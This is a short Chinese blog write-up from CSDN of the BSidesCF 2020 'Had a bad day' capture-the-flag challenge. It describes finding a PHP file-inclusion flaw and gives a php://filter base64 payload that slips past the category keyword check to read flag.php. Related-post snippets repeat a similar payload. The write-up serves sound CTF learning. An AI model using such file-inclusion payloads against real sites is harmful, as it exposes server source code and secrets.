[BSidesCF 2020]Had a bad day

最新推荐文章于 2024-04-26 23:16:19 发布
最新推荐文章于 2024-04-26 23:16:19 发布
阅读量726 收藏
点赞数
分类专栏: wp 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_55234680/article/details/121276276
版权

打开题目,发现可疑网址

index.php?category=woofers

测试参数时发现可能存在后缀为php的文件包含

index.php?category=woofers%20a

Warning: include(woofers a.php): failed to open stream: No such file or directory in /var/www/html/index.php on line 37

Warning: include(): Failed opening ‘woofers a.php’ for inclusion (include_path=’.:/usr/local/lib/php’) in /var/www/html/index.php on line 37

且服务端会检测参数category中是否含有woofersmeowers

尝试绕过并读取flag.php

index.php?category=php://filter/convert.base64-encode/woofers/resource=flag

获得flag.php源码

d0ud
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
hada-p2
03-13
【标题】"hada-p2"可能是指一个项目或者软件的版本号,通常在软件开发中,"p2"可能是代表第二个主要版本或一个特定的迭代。在这个上下文中,我们推测"hada-p2"可能是一个基于C#语言的项目。 【描述】由于描述仅为...
HADA protocol-开源
04-28
《HADA协议——开源软件在序列比对中的应用》 HADA协议,全称为Hierarchical Annotation Dependent Alignment,是一种用于序列比对的高效且灵活的方法。这个协议的开源实现为生物信息学研究提供了强大的工具,使得...
BSidesCF2020 Had a bad day
Tajang的大千世界
04-11 147
打开靶机 点击了一下WOOFERS,发现url类似于文件包含 尝试包含index.php php://filter/read=convert.base64-encode/resource=index.php 的确存在文件包含,但报错了,应该是包含的文件不对,一番尝试后,发现应该去掉后缀,如下 php://filter/read=convert.base64-encode/resource=index 给了一串编码,使用base64解码 其中PHP源码为 <?php $file =
BUUCTF_[BSidesCF 2020]Had a bad day
最新发布
m_de_g的博客
04-26 558
【代码】BUUCTF_[BSidesCF 2020]Had a bad day
BUUCTF [BSidesCF 2020] Had a bad day
Senimo
12-11 552
BUUCTF [BSidesCF 2020] Had a bad day 考点: php伪协议嵌套 启动环境: 其中包含两个按钮,选择猫和狗的图片: 此时的URL变为: http://xxx/index.php?category=meowers 其中包含有GET传参,尝试修改category传入的值,得到报错: 其中为include()函数报错,尝试获取index.php页面的源码:php://filter/read=convert.base64-encode/resource=index.php:
BUUCTF Web [BSidesCF 2020]Had a bad day1
网安小趴菜
09-20 911
BUUCTF Web [BSidesCF 2020]Had a bad day1
六年级英语上册 Unit 7 I had a bad day.第一课时教案 广东版开心.doc
10-13
小学教案
六年级英语上册 Unit 7 I had a bad day.第三课时教案 广东版开心.doc
10-13
小学教案
hada-p3
03-27
hada-p3
hada-practica-grupal
04-02
Descripcióndel videojuego { sinopsis,añode lanzamiento,empresa,编辑,国际翻译... } 预告片 早产儿 热内罗 泛欧游戏信息(PEGI) Creadores de contenido asociados(Twitch,YouTube
bad data handbook
01-08
It’s tough to nail down a precise definition of “Bad Data.” Some people consider it a purely hands-on, technical phenomenon: missing values, malformed records, and cranky file formats. Sure, that’...
old macdonald had a farm PPT学习教案.pptx
10-07
old macdonald had a farm PPT学习教案.pptx
Angular20210210a.rar
02-10
AngularJS is what HTML would have been, had it been designed for building web-apps. Declarative templates with data-binding, MVC, dependency injection.
had文件php代码
09-14
had文件php代码
HAD门机手册
09-12
《HAD门机手册》是针对HAD门机的操作、调试、故障排查和安装的一份详细指南。手册中特别强调了VVVF门机控制器的使用方法,尤其关注H100版之后的变频器控制模式设定。在H100版之后,门机变频器的控制模式设定通过变频...
OfficeOpenXmlReplaceFiled_Office_open_field_word_had9k4_源码
10-01
使用open XML操作替换word作用域,包含文本,表格,图片等替换
开心版六年级下册小学英语Unit 3 A lucky Day单元测试卷.doc
10-19
- `糟糕的一天`:a bad day 2. **单项选择解析** - 题目1:Jenny昨天忘记做作业了。动词用过去时,选C. didn't forget。 - 题目2:我度过了糟糕的一天,我没赶上公交车。用过去时,选B. missed。 - 题目3:Lisa...
Fern couldn't eat until her pig had had a drink of milk.中的两个had是什么意思
04-21
这个句子中的两个“had”都是动词“have”的过去分词形式,第一个是“had had”,表示发生在过去的过去,意为“已经喝过”,第二个是“had”,表示过去完成时,意为“已经有了”。整个句子的意思是:“在猪喝了一口...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值